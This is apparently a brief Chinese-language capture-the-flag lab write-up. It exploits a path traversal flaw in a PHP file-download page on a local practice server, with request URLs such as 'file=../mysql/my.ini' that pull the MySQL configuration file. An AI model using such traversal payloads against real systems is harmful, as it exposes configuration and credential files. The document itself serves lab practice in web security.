0x01 漏洞利用
1.页面和filedown.php一样,盲猜php代码改都没改
2.既然这题的题目是mysql的配置文件下载,我们猜测可能存在mysql目录
3.和上一题一样F12查看下载
4.实验是否有mysql目录:
192.168.72.136/control/filedownload/ini_file_download.php?file=mysql | 页面没反应 |
192.168.72.136/control/filedownload/ini_file_download.php?file=../mysql | 页面提示下载 |
5.直接输入:
192.168.72.136/control/filedownload/ini_file_download.php?file=../mysql/my.ini
发现能够下载
6.下载下来打开发现没有flag:
我们打开服务器的C:\phpStudy\MySQL目录,所有mysql的ini文件挨个差个遍发现没有flag
7.自己插入flag
打开my.ini文件,文件末尾输入 flag=poiplmkounipoj
8.再次下载文件:
9.找到flag。。
0x02 结语
靶场不太完善,也可能是我太菜了找不到 (我看了上一题和这一题的php文件,发现代码果然一模一样)